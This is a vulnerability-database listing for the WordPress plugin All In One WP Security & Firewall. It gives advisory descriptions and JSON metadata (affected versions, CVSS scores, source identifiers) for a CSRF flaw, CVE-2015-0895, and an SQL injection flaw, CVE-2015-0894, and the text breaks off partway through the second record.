
    15 vulnerabilities found for All In One WP Security & Firewall by Tips and Tricks HQ

    VAR-201503-0452

    Vulnerability from variot - Updated: 2025-04-13 23:39

    Cross-site request forgery (CSRF) vulnerability in the All In One WP Security & Firewall plugin before 3.9.0 for WordPress allows remote attackers to hijack the authentication of administrators for requests that delete logs of 404 (aka Not Found) HTTP status codes. All In One WP Security & Firewall is a WordPress plugin that provides security functionality. If a user views a malicious page while logged in, the access logs (404 events) maintained by the product may be deleted. An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks, because deleted 404 records are no longer available for review. The sources aggregated in the record below score the issue differently: NVD gives CVSS v2 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P), while IPA/JVNDB gives 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N); the latter is consistent with the integrity-only, log-deletion impact described here. WordPress is a blogging platform developed by WordPress Software Foundation in the PHP language; it supports setting up personal blogging websites on servers running PHP and MySQL.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0452",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wordpress security and firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "tips and tricks hq",
            "version": "3.8.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "v3.8.9"
          },
          {
            "model": "all in one wordpress security and firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "tips and tricks hq",
            "version": "3.8.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.9"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.3"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.9.0"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "JPCERT",
        "sources": [
          {
            "db": "BID",
            "id": "74387"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-0895",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2015-0895",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "High",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "None",
                "baseScore": 2.6,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-000038",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Low",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-78841",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-0895",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-000038",
                "trust": 0.8,
                "value": "Low"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201503-127",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-78841",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cross-site request forgery (CSRF) vulnerability in the All In One WP Security \u0026 Firewall plugin before 3.9.0 for WordPress allows remote attackers to hijack the authentication of administrators for requests that delete logs of 404 (aka Not Found) HTTP status codes. All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. If a user views a malicious page while logged in, access logs (404 events) maintained by the product may be deleted. \nAn attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          }
        ],
        "trust": 1.98
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-0895",
            "trust": 2.8
          },
          {
            "db": "JVN",
            "id": "JVN87204433",
            "trust": 2.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038",
            "trust": 2.5
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "74387",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-78841",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "id": "VAR-201503-0452",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:39:07.061000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall - Changelog",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "http://jvn.jp/en/jp/jvn87204433/index.html"
          },
          {
            "trust": 1.7,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          },
          {
            "trust": 1.7,
            "url": "http://jvndb.jvn.jp/jvndb/jvndb-2015-000038"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0895"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-0895"
          },
          {
            "trust": 0.3,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall all in one wp security \u0026 firewall"
          },
          {
            "trust": 0.3,
            "url": "http://wordpress.org/"
          },
          {
            "trust": 0.3,
            "url": "jvn.jp/en/jp/jvn87204433/index.html  "
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "db": "BID",
            "id": "74387"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-07T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "BID",
            "id": "74387"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "date": "2015-03-07T02:59:02.723000",
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-03-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-78841"
          },
          {
            "date": "2015-03-06T00:00:00",
            "db": "BID",
            "id": "74387"
          },
          {
            "date": "2015-03-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          },
          {
            "date": "2015-03-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-0895"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "All In One WP Security \u0026 Firewall vulnerable to cross-site request forgery",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000038"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-127"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201503-0451

    Vulnerability from variot - Updated: 2025-04-13 23:26

    SQL injection vulnerability in the All In One WP Security & Firewall plugin before 3.8.8 for WordPress allows remote attackers to execute arbitrary SQL commands via unspecified vectors. All In One WP Security & Firewall is a WordPress plugin that provides security functionality. ooooooo_q reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. If an administrator views a malicious page while logged in, an arbitrary SQL command may be executed. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WordPress is a blogging platform developed by WordPress Software Foundation in the PHP language; it supports setting up personal blogging websites on servers running PHP and MySQL.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201503-0451",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "all in one wordpress security and firewall",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "tips and tricks hq",
            "version": "3.8.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "tips and tricks hq",
            "version": "v3.8.7"
          },
          {
            "model": "all in one wordpress security and firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "tips and tricks hq",
            "version": "3.8.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.7"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.6"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.5"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.4"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.3"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.2"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.1"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8"
          },
          {
            "model": "all in one wp security \u0026 firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "wordpress",
            "version": "3.8.8"
          }
        ],
        "sources": [
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:tips_and_tricks_hq:all_in_one_wordpress_security_and_firewall",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ooooooo_q",
        "sources": [
          {
            "db": "BID",
            "id": "74856"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-0894",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.8,
                "id": "CVE-2015-0894",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "High",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "Partial",
                "baseScore": 5.1,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-000037",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 6.8,
                "id": "VHN-78840",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-0894",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-000037",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201503-126",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-78840",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection vulnerability in the All In One WP Security \u0026 Firewall plugin before 3.8.8 for WordPress allows remote attackers to execute arbitrary SQL commands via unspecified vectors. All In One WP Security \u0026 Firewall is WordPress plugin that provides security functionality. ooooooo_q reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.If an administrator views a malicious page while logged in, an arbitrary SQL command may be executed. \nExploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. WordPress is a set of blogging platform developed by WordPress Software Foundation using PHP language, which supports setting up personal blogging websites on PHP and MySQL servers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          }
        ],
        "trust": 1.98
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-0894",
            "trust": 2.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037",
            "trust": 2.8
          },
          {
            "db": "JVN",
            "id": "JVN30832515",
            "trust": 2.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "74856",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-78840",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "BID",
            "id": "74856"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-126"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "id": "VAR-201503-0451",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T23:26:46.018000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "All In One WP Security \u0026 Firewall - Changelog",
            "trust": 0.8,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-78840"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-000037"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-0894"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "http://jvn.jp/en/jp/jvn30832515/index.html"
          },
          {
            "trust": 2.0,
            "url": "https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/"
          },
          {
            "trust": 1.7,
            "url": "http://jvndb.jvn.jp/jvndb/jvndb-2015-000037"
          },
          {
            "trust": 0.8,
